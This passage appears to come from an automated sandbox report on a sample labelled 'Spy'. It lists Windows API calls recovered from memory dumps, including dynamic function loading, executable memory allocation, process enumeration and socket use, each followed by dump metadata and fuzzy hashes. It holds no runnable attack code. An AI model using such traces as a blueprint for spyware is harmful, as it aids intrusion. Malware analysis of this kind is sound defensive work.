                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B07360
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B07370
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B07395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: d0af6703f998236c4c3d1a068c7ab118e41d03a6125d90e089f5b17f418b6c38
                                                      • Instruction ID: c2f5a7b1966e3308be9307271c94a67af0105f2085994d787ac6d44990695690
                                                      • Opcode Fuzzy Hash: d0af6703f998236c4c3d1a068c7ab118e41d03a6125d90e089f5b17f418b6c38
                                                      • Instruction Fuzzy Hash: B621C532654118BFEF118F54CC85FBF7BAAEB89754F118164FD00971D0CA71AC529BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B07D97
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B07DAC
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B07DB9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: d670e2ac4dcf5d8d8233edd249b47742740ce7ebc0067010ea429c4574ca17d6
                                                      • Instruction ID: 21ee117a263115badd329aa015f90e4e5f6404025e5f45eccad4d47a5f871f6f
                                                      • Opcode Fuzzy Hash: d670e2ac4dcf5d8d8233edd249b47742740ce7ebc0067010ea429c4574ca17d6
                                                      • Instruction Fuzzy Hash: 00110AB2644209BFDF245F64CC45FE77BE9EF89754F114229FA41A60D0DA71E851CB20
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AC027A,?), ref: 00AFC6E7
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFC6F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                      • API String ID: 2574300362-1816364905
                                                      • Opcode ID: bc4a6176fe92c85b6760bec6609e327e72156f19117341f02fbebc43ee27324d
                                                      • Instruction ID: 3741b1511da35f30c6b10f61802e57f9dcf6c6d2f70eb3ef6eb0fba06f33f9e9
                                                      • Opcode Fuzzy Hash: bc4a6176fe92c85b6760bec6609e327e72156f19117341f02fbebc43ee27324d
                                                      • Instruction Fuzzy Hash: 78E08C3816070AABD7206B6AC948AA27AD8AF04364B908469F985D2220DBB4C8808B10
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00A94AF7,?), ref: 00A94BB8
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A94BCA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: 8bd7dd62bef4d0504cf65728b3d167983e180b6a86ffb28f5998e452a1097731
                                                      • Instruction ID: 4dcf0a42ed97fdd7dc201ce91b6e83adbf44d294983011580463849d5511497a
                                                      • Opcode Fuzzy Hash: 8bd7dd62bef4d0504cf65728b3d167983e180b6a86ffb28f5998e452a1097731
                                                      • Instruction Fuzzy Hash: 24D0C2B0520712DFD7206F30DC08B4672D4AF04340F10CC69E481D6564DEB4C4D0C700
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00A94B44,?,00A949D4,?,?,00A927AF,?,00000001), ref: 00A94B85
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A94B97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: 0e121f28d8d3f1b51339f1427f89897abe1a4d90bffda93ac922c295fc58a493
                                                      • Instruction ID: a50a7c90f8af16cb21bfa0fd317bd0617fb7b5145e34f26d612efdd5117f9143
                                                      • Opcode Fuzzy Hash: 0e121f28d8d3f1b51339f1427f89897abe1a4d90bffda93ac922c295fc58a493
                                                      • Instruction Fuzzy Hash: 43D01270520756DFD7206F35DC18B4676D4AF04355F51C869E485E2564DAB4D4C0C610
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00B01696), ref: 00B01455
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B01467
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: 428d6eb36702fc46ce698849c55b8d8902042bf2de1d144a76acccedc23ddb55
                                                      • Instruction ID: 0ae3479feffaedd3a493322521c933fa4a89d3c14bd0899f14982815cdeaab40
                                                      • Opcode Fuzzy Hash: 428d6eb36702fc46ce698849c55b8d8902042bf2de1d144a76acccedc23ddb55
                                                      • Instruction Fuzzy Hash: 80D0EC315107129FD7205F7588086467AD4AF06395F11C86AA4D5E32A0DAB4D8D08A10
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00A95E3D), ref: 00A955FE
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A95610
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: 2c5ff5faa911ff1590bc2e2a4a23235edd6e6c281668e059e0ce8003dca8d673
                                                      • Instruction ID: b6521e1fc90d4fd276caba1fe76e9068a4f9459adbb400b12b1f9f2640992e72
                                                      • Opcode Fuzzy Hash: 2c5ff5faa911ff1590bc2e2a4a23235edd6e6c281668e059e0ce8003dca8d673
                                                      • Instruction Fuzzy Hash: 0CD0C234D30712DFD7206F34C84928676D4AF01391B84C829E481D2160DAB4C4C0C740
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00AF93DE,?,00B10980), ref: 00AF97D8
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AF97EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: 9f27618abca23767b5e7ba8e6a4ebf1a6be0e0c7ba381eb318f10a9c0a4391e5
                                                      • Instruction ID: b029210898dede58f376e6ef9b985a0b87fd45d25780095c44a0a84b27948f79
                                                      • Opcode Fuzzy Hash: 9f27618abca23767b5e7ba8e6a4ebf1a6be0e0c7ba381eb318f10a9c0a4391e5
                                                      • Instruction Fuzzy Hash: 75D0C730420317DFD720AF74D888796B2E4BF04381F50C82AF482EA160EFB4C8C0CA40
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18d4307764dc75f25d2d1d8a7443e55ae5f1564472936850166d8b82ea6d31ee
                                                      • Instruction ID: b58041e328b954a39cd7e047ee3e6dc23bcc4092d1582a5fdffc6d8184cb3d3d
                                                      • Opcode Fuzzy Hash: 18d4307764dc75f25d2d1d8a7443e55ae5f1564472936850166d8b82ea6d31ee
                                                      • Instruction Fuzzy Hash: C8C17F75A00216EFCB18CF98C884EAEB7B5FF48714B158599E806EB351DB35ED81CB90
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 00AFE7A7
                                                      • CharLowerBuffW.USER32(?,?), ref: 00AFE7EA
                                                        • Part of subcall function 00AFDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00AFDEAE
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00AFE9EA
                                                      • _memmove.LIBCMT ref: 00AFE9FD
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      • Opcode ID: 5ce514fd5a55249f5b5d69a98f65f5b87eb10fd4642376466eb6421ee71817d4
                                                      • Instruction ID: 560dab4a2a0ef22faa7ad1f1d576d9a9c7b776bf31411a65e1e552cb7b15cafb
                                                      • Opcode Fuzzy Hash: 5ce514fd5a55249f5b5d69a98f65f5b87eb10fd4642376466eb6421ee71817d4
                                                      • Instruction Fuzzy Hash: 4CC18971A083058FC714EF68C48096ABBE4FF89754F04896EF999DB361D731E946CB82
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00AF87AD
                                                      • CoUninitialize.OLE32 ref: 00AF87B8
                                                        • Part of subcall function 00B0DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00AF8A0E,?,00000000), ref: 00B0DF71
                                                      • VariantInit.OLEAUT32(?), ref: 00AF87C3
                                                      • VariantClear.OLEAUT32(?), ref: 00AF8A94
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: 5e3986486801dbdcb54a050d0a984c638598fd7a4d500fa675351b46c3cb5a69
                                                      • Instruction ID: b447d682520c8902b4ba251550ce9fe271f241135e0c5061653f25815c88cd06
                                                      • Opcode Fuzzy Hash: 5e3986486801dbdcb54a050d0a984c638598fd7a4d500fa675351b46c3cb5a69
                                                      • Instruction Fuzzy Hash: 53A17A35604B069FD710EFA4C581B2AB7E4FF88354F148849FA969B3A1DB74ED40CB92
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8308
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8320
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00B10988,000000FF,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8345
                                                      • _memcmp.LIBCMT ref: 00AD8366
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: afcb37a6f2f6976dfa9627ede599b9be21e4f626d7b99c05a413e004d8af7d62
                                                      • Instruction ID: 6b0518f31e1ddc3859ed9fc478a5d77bcce59d238950c93b428c900114ea35e2
                                                      • Opcode Fuzzy Hash: afcb37a6f2f6976dfa9627ede599b9be21e4f626d7b99c05a413e004d8af7d62
                                                      • Instruction Fuzzy Hash: 62814971A00109EFCB04DF94C988EEEB7B9FF89715F204599E516AB250DB71AE06CB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: 332fdf6a6bf39d2a25380f7c1169be910fd092aac7b8453edc3b298e1d3efa46
                                                      • Instruction ID: 035094105b36f2580e33984877d08a3320340403b6ccd77296035489c43df623
                                                      • Opcode Fuzzy Hash: 332fdf6a6bf39d2a25380f7c1169be910fd092aac7b8453edc3b298e1d3efa46
                                                      • Instruction Fuzzy Hash: DE51C434608B029BDB28AF79D995A2DF7F5AF45310B20881FE547CB7A1FB70D8808B05
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00AFF526
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00AFF534
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00AFF5F4
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00AFF603
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      • Opcode ID: 779009f7f03090f6bf797709ded167f75647dec5cd0344a6c19d28747ca40955
                                                      • Instruction ID: 011c5e04d6bed97431507a40510b4bc04b3332d929de123d0ecc8d019009635f
                                                      • Opcode Fuzzy Hash: 779009f7f03090f6bf797709ded167f75647dec5cd0344a6c19d28747ca40955
                                                      • Instruction Fuzzy Hash: D3517DB1108315AFD710EF64D885EABB7E8EF98710F40492DF595D72A1EB70E904CB92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                      • Instruction ID: 4a47fb3dc1865ed6052fe873d806a37ab1972d76f38230d3dd327252adcfaeff
                                                      • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                      • Instruction Fuzzy Hash: 844196356007069BDF288F69C9909AFBBA5AFCA3A0B24817DF455C76D0D7B09D508B44
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ADA68A
                                                      • __itow.LIBCMT ref: 00ADA6BB
                                                        • Part of subcall function 00ADA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ADA976
                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ADA724
                                                      • __itow.LIBCMT ref: 00ADA77B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: c9f46a88f3c6c3b3d1dda04dc284d010ead889c99a66df17a02dadd1a4d1c8cd
                                                      • Instruction ID: 6080cd1a51a77141f773811419129b00a835be486a4442838adfa2c4d2fd6c0e
                                                      • Opcode Fuzzy Hash: c9f46a88f3c6c3b3d1dda04dc284d010ead889c99a66df17a02dadd1a4d1c8cd
                                                      • Instruction Fuzzy Hash: C4416E75A00309ABDF11EF54C956BEE7BB9EF54750F04006AF906A3391DB709A44CAA2
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00AF70BC
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AF70CC
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AF7130
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AF713C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                      • String ID:
                                                      • API String ID: 2214342067-0
                                                      • Opcode ID: 30d4bb683f21737946782f50192c9e0028974e1dcacab24514e3dbaf283f37a7
                                                      • Instruction ID: c9e78a2e96474157aa257a85cd524055c6821c62aeba25f99af041643e5eebdf
                                                      • Opcode Fuzzy Hash: 30d4bb683f21737946782f50192c9e0028974e1dcacab24514e3dbaf283f37a7
                                                      • Instruction Fuzzy Hash: 9A41BF717442016FEB24BF64DD86F7E77E4AB08B14F048558FA199B3D2EBB09C008B91
                                                      APIs
                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B10980), ref: 00AF6B92
                                                      • _strlen.LIBCMT ref: 00AF6BC4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
